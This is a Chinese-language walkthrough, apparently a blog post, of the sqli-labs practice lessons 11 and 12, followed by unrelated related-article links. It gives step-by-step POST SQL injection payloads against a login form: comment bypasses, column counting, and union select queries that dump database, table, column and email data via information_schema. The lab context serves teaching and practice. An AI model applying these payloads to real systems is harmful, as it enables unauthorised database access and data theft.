Less-11(报错注入POST方式)

1.判断是否存在注入点

因为是POST 方式的与GET方式稍有不同,可以选择使用burp suite以及火狐的hackbar进行操作,直接在输入框username处输入admin密码随意,得到一个正确的回显

Username处输入admin’密码随意,出现报错

提示在123456处因为 ’ 出现错误,所以尝试在username处输入admin’ #(将密码及后面部分全部注释掉,即为:uname=admin' #&passwd=123456&submit=Submit)(这里不能用--+)

回显正确,判断存在注入点,注入方式为:’’

2.判断回显位数

uname=admin' order by 2#&passwd=1&submit=Submit  经过判断得到回显位数为2

3.爆数据库

uname=-admin' union select 1,database()#&passwd=1&submit=Submit

因为使用union,那么前面部分必须要不存在才行,得到数据库名字为security

4.爆表名

uname=-admin' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #&passwd=1&submit=Submit,如下图,得到数据库下的所有表名

5.爆字段

uname=-admin' union select group_concat(column_name) from information_schema.columns where table_name='emails' #&passwd=1&submit=Submit,发现出现了如下报错的提示:

使用的SELECT语句具有不同数量的列

经过检查发现:回显位是2,但是使用select语句时并没有用两个

修改为:uname=-admin' union select 1,group_concat(column_name) from information_schema.columns where table_name='emails' #&passwd=&submit=Submit

如下图,得到表emails下的所有字段

6.爆数据

uname=-admin' union select 1,group_concat(id) from emails #&passwd=&submit=Submit

如图,得到字段id下的所有数据

-------------------------------------------------------END----------------------------------------------------------------

Less-12(报错注入)

1.判断是否存在注入点

当执行admin 以及admin'时都未出现报错,而执行如下时,出现报错信息

uname=admin"&passwd=admin&submit=Submit

通过分析,当执行uname=admin")#&passwd=&submit=Submit时,回显正常,判断存在注入点,注入方式为:(“”)

2.判断回显位数

uname=admin") order by 2#&passwd=&submit=Submit,经过尝试得到回显位数为2

3.爆数据库

uname=-admin") union select 1,database()#&passwd=&submit=Submit,得到数据库名

4.爆表名

uname=uname=-admin") union select 1, group_concat(table_name) from information_schema.tables where table_schema='security'#&passwd=&submit=Submit

5.爆字段

uname=-admin") union select 1,group_concat(column_name) from information_schema.columns where table_name='uagent'#&passwd=&submit=Submit,表uagent中的数据为空,如下

6.爆数据

因为uagent里的数据都为空,所以还是选择爆emails,比较好观察

uname=-admin") union select 1,group_concat(email_id) from emails#&passwd=&submit=Submit

-------------------------------------------------------END----------------------------------------------------------------

sqli-labs less-11 --> less-12的更多相关文章

  1. [团队项目]第二个冲刺 看板和燃尽图 Sprint2 6.8/6.9/6.10/6.11/6.12/6.13/6.14

    1.开始一个新的冲刺: 起止:2016.6.1~2016.6.14 按照以下过程进行 ProductBacklog:继续向下细化 Sprint 计划会议:确定此次冲刺要完成的目标 Sprint Bac ...

  2. 2016年11月12日 星期六 --出埃及记 Exodus 20:3

    2016年11月12日 星期六 --出埃及记 Exodus 20:3 "You shall have no other gods before me.除了我以外,你不可有别的 神.

  3. SQLI LABS Basic Part(1-22) WriteUp

    好久没有专门练SQL注入了,正好刷一遍SQLI LABS,复习巩固一波~ 环境: phpStudy(之前一直用自己搭的AMP,下了这个之后才发现这个更方便,可以切换不同版本的PHP,没装的小伙伴赶紧试 ...

  4. Atitit jquery  1.4--v1.11  v1.12  v2.0  3.0 的新特性

    Atitit jquery  1.4--v1.11  v1.12  v2.0  3.0 的新特性 1.1. Jquery1.12  jQuery 2.2 和 1.12 新版本发布 - OPEN资讯.h ...

  5. 阅读<构建之法>第三10、11、12章并提出问题

    <构建之法>第10.11.12章 第10章: 问题:对我们了解了用户的需求后,但是我们想法和做出来的软件会和用户的需求有偏差,比如风格.界面的修饰等等,那么我们程序猿怎样才能让自己的想法更 ...

  6. MAC 下编译 ANDROID P 源码 提示 internal error: Could not find a supported mac sdk: ["10.10" "10.11" "10.12" "10.13"]

    MAC 下编译 ANDROID P 源码出现下面的问题: ninja: no work to do. [21/21] out/soong/.bootstrap/bin/soong_build out/ ...

  7. JDBC中 mysql数据库的连接工具类 Java登录 及增删改查 整理 附带:Navicat Premium 11.0.12中文破解版.zip(下载)mysql数据库工具

    先写一个工具类,有实现MySQL数据库连接的方法,和关闭数据库连接.关闭ResultSet  结果集.关闭PreparedStatement 的方法.代码如下: package com.swift; ...

  8. 总结近期CNN模型的发展(一)---- ResNet [1, 2] Wide ResNet [3] ResNeXt [4] DenseNet [5] DPNet [9] NASNet [10] SENet [11] Capsules [12]

    总结近期CNN模型的发展(一) from:https://zhuanlan.zhihu.com/p/30746099 余俊 计算机视觉及深度学习   1.前言 好久没有更新专栏了,最近因为项目的原因接 ...

  9. Sqli labs系列-less-3 。。。

    原本想着找个搜索型的注入玩玩,毕竟昨天被实力嘲讽了 = = . 找了好长时间,我才发现,我没有 = = ,网上搜了一个存在搜索型注入的源码,我看了好长时间,楞没看出来从哪里搜索注入了....估计是我太 ...

  10. Sqli labs系列-less-2 详细篇

    就今天晚上一个小插曲,瞬间感觉我被嘲讽了. SQL手工注入这个东西,杂说了吧,如果你好久不玩的话,一时说开了,你也只能讲个大概,有时候,长期不写写,你的构造语句还非常容易忘,要不我杂会被瞬间嘲讽了啊. ...

随机推荐

  1. ASP.NET Core使用环境变量

    前言 通常在应用程序开发到正式上线,在这个过程中我们会分为多个阶段,通常会有 开发.测试.以及正式环境等.每个环境的参数配置我们会使用不同的参数,因此呢,在ASP.NET Core中就提供了相关的环境 ...

  2. Java 添加、读取、删除Excel文档属性

    在文档属性中,可以设置诸多关于文档的信息,如创建时间.作者.单位.类别.关键词.备注等摘要信息以及一些自定义的文档属性.下面将通过Java程序来演示如何设置,同时对文档内的已有信息,也可以实现读取和删 ...

  3. node - 简单的爬虫案例

    cherrio模块 安装 cnpm install cherrio 使用方法 const cheerio = require('cheerio') const $ = cheerio.load('&l ...

  4. docker 镜像save和转换

    docker save出来的tar包转成镜像 $ docker load < busybox.tar.gz 使用import转的镜像里面是空的,无法启动 报错如下Error: Error res ...

  5. jq模糊匹配(qq:2798641729)

    图灵学院--Java高级架构师-互联网企业级实战VIP课程(价值6380)(qq:1324981084) jq是一般程序员在前台开发的时候都会使用的技术,其中模糊匹配查询在动态添加标签的时候经常用到, ...

  6. leetcode--js--Median of Two Sorted Arrays

     问题描述: There are two sorted arrays nums1 and nums2 of size m and n respectively. Find the median of ...

  7. 小白的linux笔记1:CentOS 8 安装与设置

    为了在服务器上跑爬虫,以及学SegNet,研究了一圈看来linux是必学品了.在自己电脑上安装了一个 1.官网下载iso,一个linux dvd是稳定版,选之,另一个stream版是更新更快的测试版, ...

  8. spring cloud微服务快速教程之(十) gateway 服务网关

    0.前言 gateway是spring的二代网关, 作为Netflix Zuul的替代者,是异步非阻塞网关 ,ZUUL2也是异步非阻塞的,但未纳入spring cloud整合计划 基于WebFlux  ...

  9. js对象模型2

    g

  10. VAE

    Waiting list: basic knowledge: http://adamlineberry.ai/vae-series/vae-code-experiments